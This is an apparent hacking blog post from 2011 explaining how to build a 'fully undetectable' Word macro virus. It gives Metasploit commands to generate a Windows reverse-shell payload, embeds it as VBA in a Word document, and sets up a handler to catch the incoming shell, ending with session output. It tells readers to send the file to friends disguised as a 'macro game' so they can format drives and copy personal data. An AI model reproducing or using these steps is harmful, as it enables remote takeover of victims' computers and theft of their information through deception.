We use Metasploit Linux version to create virus or handle all remote connections.
Download Link: www.metasploit.com
Action: When any user runs the word file, we get command prompt with full administrative
rights to format any drive, copy personal information.
Requirement:
1. Linux Machine (To generate virus and to listen connections)
2. Windows Machine (To embedd VBA code into word file)
Type following commands at Linux shell prompt:
# cd Desktop
# cd framework32
# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.8 LPORT=4444 V>/root/vbvirus.txt
Note: LHOST=192.168.1.8 is our linux machine ip address.
LPORT=4444 is a local port for communication.
Just copy vbvirus.txt file in pen drive and goto another windows system where office 2003
installed. after we open MS WORD 2003 and select tools options select Macro select
Visual basic editor
After select File menu Import file select Vbvirus.txt
Save the file and exit and send to ur friends. Say this is good macro game.
To handle Windows command prompt at Linux side:
Open Linux Shell prompt and type following commands:
# cd Desktop
# cd framework32
#./msfconsole
use exploit/multi/handler
> set payload windows/shell/reverse_tcp
> set LHOST 192.168.1.8
> set LPORT 4444
> set exitonsession TRUE
>exploit
Linux is ready to accept windows command prompt for remote control any system.
Advantage:
Fully undetectable for all anti virus’s.
POC:
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler…
[*] Command shell session 1 opened (192.168.1.139:4444 -> 192.168.1.8:4444)
Microsoft Windows XP [Version 5.1.2600]
(
C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32
Want vedio help:- http://thesecretofhacking.com/vd/ch3/cs3
Wednesday, January 12, 2011
Create Undectable Macro Virus for Windows OS
4:37 PM
No comments
0 comments:
Post a Comment